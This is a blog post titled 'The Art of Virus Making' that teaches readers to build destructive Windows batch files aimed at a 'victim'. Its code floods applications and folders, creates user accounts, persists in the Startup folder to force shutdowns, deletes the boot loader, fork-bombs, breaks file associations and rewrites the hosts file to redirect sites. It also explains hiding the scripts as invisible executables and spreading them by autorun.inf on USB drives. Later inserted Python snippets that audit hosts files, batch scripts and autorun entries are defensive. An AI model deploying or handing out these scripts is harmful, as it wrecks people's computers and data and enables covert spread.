Saturday, 3 January 2015

THE ART OF VIRUS MAKING (batch files)

Batch Files - the art of creating viruses
I could just give you the code to paste into Notepad and ask you to save the files with the extension .bat, and your deadly batch viruses would be ready. But instead of that, I have focused on making the basics of batch files clear and developing the approach to code your own viruses.
What are Batch Files?
Let's begin with a simple example. Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.
Now type these commands one by one:
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'
We first make a folder/directory 'x', then enter folder 'x', then make a folder 'y' in folder 'x'. Now delete the folder 'x'.
Let's do the same thing in another way. Copy these three commands into Notepad and save the file as anything.bat.
Now just double-click on this batch file and the same work will be done: you will get a folder 'x' on your desktop and a folder 'y' in it. This means the three commands executed line by line when we ran the batch file.
So a batch file is simply a text file containing a series of commands which are executed automatically, line by line, when the batch file is run.
What can batch viruses do?
They can be used to delete Windows files, format data, steal information, irritate the victim, consume CPU resources to affect performance, disable firewalls, open ports, modify or destroy the registry, and for many more purposes.
Now let's start with simple code. Just copy the code to Notepad and save it as anything.bat (I mean anything you wish, but the extension must be bat, and save it as 'All files' instead of 'Text files').
Note: Type 'help' in the command prompt to learn about some basic commands, and to learn about using a particular command, type 'command_name /?' without quotes.
1. Application Bomber
@echo off // It instructs to hide the commands
when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code, when executed, will repeatedly open different applications like Paint, Notepad and the command prompt, irritating the victim and of course affecting performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that generates a random positive number. So this code will start creating folders whose names can be any random number.
3. User account flooder
@echo off
:x
net user %random% /add //create user account
goto x
This code would start creating Windows user accounts whose names could be any random numbers.
3. Shutdown Virus
copy anything.bat “C:\Documents and Settings
\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings
\All Users\Start Menu\Programs\Startup” //
these two commands will copy the batchfile in
start up folders (in XP)
shutdown -s -t 00 //this will shutdown the
computer in 0 seconds
Note: Files in the Startup folder get started automatically when Windows starts. You should use the first two lines of code in every virus so that it copies itself into the Startup folder. The Startup folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Every time the victim starts the computer, the batch file in the Startup folder will run and shut down the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from the Startup folder.
4. Deleting boot files
Go to the C drive in Win XP, Tools -> Folder Options -> View.
Now uncheck the option 'Hide operating system files' and check the option 'Show hidden files and folders'. Click Apply.
Now you can see the operating system files. There is a file, 'ntldr', which is the boot loader used to boot Windows.
Let's make a batch file to delete this file from the victim's computer, and Windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear
system file attribute, read only attribute , hidden
file attribute respectively
del ntldr //delete ntldr file
After running this batch file, the system will not reboot, and a normal victim would definitely install Windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe percentage
zero
This code creates a large number of processes very quickly in order to saturate the process table of Windows. It will just hang Windows.
6. Extension Changer
@echo off
assoc .txt=anything // this command associates
extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a file type; for example, the extension ‘exe’ is associated with the file type ‘exefile’. To see them, just enter the command ‘assoc’ in the command prompt.
The above code changes the association of some extensions to the file type ‘anything’ (meaning you can write anything), which obviously doesn’t exist. So all exe (Paint, games, command prompt and many more), jpeg, png and mpeg files wouldn’t open properly.
7. DNS Poisoning
There is a file called ‘hosts’ located at c:\windows\system32\drivers\etc. We can place a website and an IP in front of it. By doing this, we want our web browser to take us to the host located at that IP when that website name is entered. I mean, the request to resolve the IP of the website is not sent to the Domain Name Server (DNS) if the name of the website is in the hosts file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com > C:
\windows\system32\drivers\etc\hosts //this
command prints or add xxx.xxx.xxx.xxx.
www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx and www.anything.com with the IP address and website of your choice. You can take/redirect the victim to any host located at a specific IP when he tries to log on to a specific website, or you can simply block any website by entering its name and any invalid IP address.
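To check a machine for the change described above, the following added example (not part of the original post) audits the text of a hosts file. The function name audit_hosts, the sample contents and the documentation-range address 203.0.113.10 are assumptions made for the illustration.

```python
import ipaddress

EXPECTED = {"localhost"}  # assumption: the only name a clean hosts file maps

def audit_hosts(text):
    """Return (line_no, ip, name, reason) for every suspicious hosts entry."""
    findings, saw_comment = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        saw_comment = saw_comment or line.startswith("#")
        fields = line.split("#", 1)[0].split()
        if len(fields) < 2:
            continue  # blank line, comment, or malformed entry
        ip, names = fields[0], fields[1:]
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings += [(no, ip, n, "invalid address") for n in names]
            continue
        local = addr.is_loopback or addr.is_unspecified
        for n in names:
            if local and n.lower() in EXPECTED:
                continue
            reason = ("name pinned to a local address (blocked)" if local
                      else "static override, DNS is never asked")
            findings.append((no, ip, n, reason))
    # A lone '>' redirect replaces the file, so the stock comment header is lost.
    if text.strip() and not saw_comment:
        findings.append((0, "", "", "no comment lines: file may have been overwritten"))
    return findings

# Constructed samples: the file after the redirect above (a documentation-range
# address stands in for xxx.xxx.xxx.xxx) and a clean file for comparison.
TAMPERED = "203.0.113.10 www.anything.com\n"
CLEAN = "# sample header\n#   127.0.0.1   localhost\n127.0.0.1 localhost\n"

if __name__ == "__main__":
    for label, body in (("tampered", TAMPERED), ("clean", CLEAN)):
        print(label, audit_hosts(body))
```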
Viruses we just coded
Note: Most of the batch viruses are simply undetectable by any antiviruses.
Tip: Coding good viruses just depends on the DOS commands you know and the logic you use.
Limitations of Batch Viruses:
1. The victim can easily read the commands by opening the batch file in Notepad.
2. The command prompt screen pops up; it alerts the victim and he can stop it.
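Because the commands sit in the file as plain text, as limitation 1 says, a defender can triage a batch file before it runs. This added example (not from the original post) scans a script for the behaviours described on this page; the rule names, patterns and sample scripts are constructed for the illustration.

```python
import re

# Constructed rules, one per behaviour this page describes.
RULES = [(name, re.compile(rx, re.IGNORECASE)) for name, rx in [
    ("self-piping fork bomb", r"%0\s*\|\s*%0"),
    ("copies a file into a Startup folder", r"\bcopy\b.*\\Programs\\Startup"),
    ("redirects output into the hosts file", r">>?\s*\"?[^\s\"]*\\drivers\\etc\\hosts"),
    ("rewrites a file association", r"^\s*assoc\s+\.\w+\s*="),
    ("creates a local account", r"\bnet\s+user\s+\S+\s+/add\b"),
    ("touches the XP boot loader", r"\b(attrib|del|erase)\b.*\bntldr\b"),
    ("forces a shutdown", r"\bshutdown\b.*\s[-/]s\b"),
]]
LABEL = re.compile(r"^\s*:(\w+)")
GOTO = re.compile(r"^\s*goto\s+:?(\w+)", re.IGNORECASE)

def triage(script):
    """Return (line_no, finding) pairs for a batch file's text."""
    findings, labels = [], set()
    for no, line in enumerate(script.splitlines(), 1):
        label = LABEL.match(line)
        if label:
            labels.add(label.group(1).lower())
        jump = GOTO.match(line)
        # A goto at the start of a line that targets an earlier label has no
        # exit condition: the loop body repeats until the process is killed.
        if jump and jump.group(1).lower() in labels:
            findings.append((no, "unconditional backward goto (endless loop)"))
        findings += [(no, name) for name, rx in RULES if rx.search(line)]
    return findings

# Constructed samples: a flooder-style loop, a persistence-plus-shutdown script,
# and a benign retry script that must produce no findings.
LOOP = "@echo off\n:x\nmd %random%\ngoto x\n"
PERSIST = ('@echo off\ncopy upd.bat "C:\\Users\\sys\\AppData\\Roaming\\Microsoft'
           '\\Windows\\Start Menu\\Programs\\Startup"\nshutdown -s -t 00\n')
BENIGN = "@echo off\n:retry\nping -n 1 example.com\nif errorlevel 1 goto retry\necho done\n"

if __name__ == "__main__":
    for name, body in (("loop", LOOP), ("persist", PERSIST), ("benign", BENIGN)):
        print(name, triage(body))
```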
To overcome these limitations, we need to convert these batch files into executable files, that is, exe files.
Download this Batch To Exe converter from here.
After running the converter, open the batch file virus, save it as an exe file, set the visibility mode to 'Invisible application', then just click the compile button.
You can use other options as per your requirement.
Spreading batch viruses through pen drive:
Step 1. Open Notepad and write:
[autorun]
open=anything.bat
Icon=anything.ico
Save the file as ‘autorun.inf’.
Step 2. Put this ‘autorun.inf’ and your actual batch virus ‘anything.bat’ on the pen drive.
When the victim plugs in the pen drive, autorun.inf will launch anything.bat and the commands in the batch file virus will execute.
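Removable media can be checked for this before it is opened. This added example (not from the original post) reads the text of an autorun.inf and reports every entry that names a program to launch; the function name, the extension list and the sample files are assumptions.

```python
import re

# Keys in the [autorun] section that name a program to launch.
LAUNCH_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)
# Extensions treated as directly runnable (assumed list for this example).
RUNNABLE = re.compile(r"\.(bat|cmd|exe|com|scr|pif|vbs|js)\b", re.I)

def audit_autorun(text):
    """Return (line_no, key, target, runnable) for each launch entry."""
    findings, section = [], None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        # Only key=value lines inside [autorun] can start a program.
        if section != "autorun" or "=" not in line:
            continue
        key, target = (part.strip() for part in line.split("=", 1))
        if LAUNCH_KEY.match(key):
            findings.append((no, key.lower(), target, bool(RUNNABLE.search(target))))
    return findings

# Constructed samples: the file from Step 1, and a harmless label/icon-only file.
FLAGGED = "[autorun]\nopen=anything.bat\nIcon=anything.ico\n"
LABEL_ONLY = "[AutoRun]\nlabel=Backup\nicon=drive.ico\n"

if __name__ == "__main__":
    print(audit_autorun(FLAGGED))
    print(audit_autorun(LABEL_ONLY))
```

Windows 7 and later do not honour the open= entry on USB flash drives by default, so a finding here matters most on older or reconfigured systems.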
